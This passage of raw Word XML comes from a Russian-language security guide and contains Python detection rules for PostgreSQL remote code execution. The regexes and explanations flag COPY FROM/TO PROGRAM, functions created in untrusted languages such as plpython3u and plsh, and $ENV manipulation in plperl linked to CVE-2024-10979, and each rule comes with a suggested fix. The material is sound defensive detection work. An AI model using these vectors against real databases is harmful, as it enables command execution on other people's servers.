              <w:t>plsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Python/bash на хосте</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2CB7E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет</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97472C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">средний — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE FUNCTION ... LANGUAGE plpython3u/plsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в DDL-логах</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C3A2792" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D190D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный набор паттернов по всем четырём подразделам:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787023B"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516D6A99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F4F43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0BBD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RCE = "rce"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E223224" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA7A88"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3E6B52CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.RCE: 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654606F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E045F15"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68C0A3E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"rce_copy_program": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C0D96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCOPY\b[^;]*\b(FROM|TO)\s+PROGRAM\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03821055" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB94261" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7134513C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"rce_untrusted_lang": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D6E5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b[^;]*\b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27200ADB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"LANGUAGE\s+(plperlu|plpython3u|plpythonu|plsh|plr)\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D2D08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C54B99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1EF32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"rce_cve_2024_10979": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D721700" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bLANGUAGE\s+plperl\b(?!u)[^;]*\$ENV\s*\{",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE91991" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55869CDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C347C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B631FE"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70A8B8E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["rce_copy_program"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAA21B"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5FB9A92B"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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BBBC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F7D03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="COPY FROM/TO PROGRAM исполняет shell-команду "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBAD17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "на сервере PostgreSQL как пользователь postgres "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C0C65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(требует pg_execute_server_program или superuser).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64544BA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите COPY ... PROGRAM из application-кода; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6C153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "для backup/ETL — отдельная роль и отдельная сессия, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F935275" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не из веб-приложения.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF5361" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE9A44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030D701" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["rce_untrusted_lang"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB512F6"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39A539CA"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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6CCBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408ED50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE FUNCTION в untrusted procedural language "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584E591" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(plperlu/plpython3u/plsh/plr) даёт полный доступ "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56679470" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "к OS-API; требует superuser и приводит к RCE.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB65F55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Не создавайте функции в untrusted-языках из "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15742722" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "application-кода; пересмотрите, нужны ли "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E025E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "untrusted-расширения вообще (REVOKE / DROP EXTENSION).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487DA0C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D907E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECECF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["rce_cve_2024_10979"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BAC9A"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252966DD"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vulnerability_class=VulnerabilityClass.RCE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BFABC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AEDEF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Модификация $ENV{} в trusted plperl-функции — "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC1C9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "паттерн эксплуатации CVE-2024-10979. На версиях PG "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2BB68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "до 17.1/16.5/15.9/14.14/13.17/12.21 ведёт к RCE "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C4EBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "без superuser.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541566DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Обновите PostgreSQL до фиксированной minor-версии "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541789E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "(17.1+/16.5+/...); ограничьте USAGE на plperl "</w:t>
      </w:r>
    </w:p>
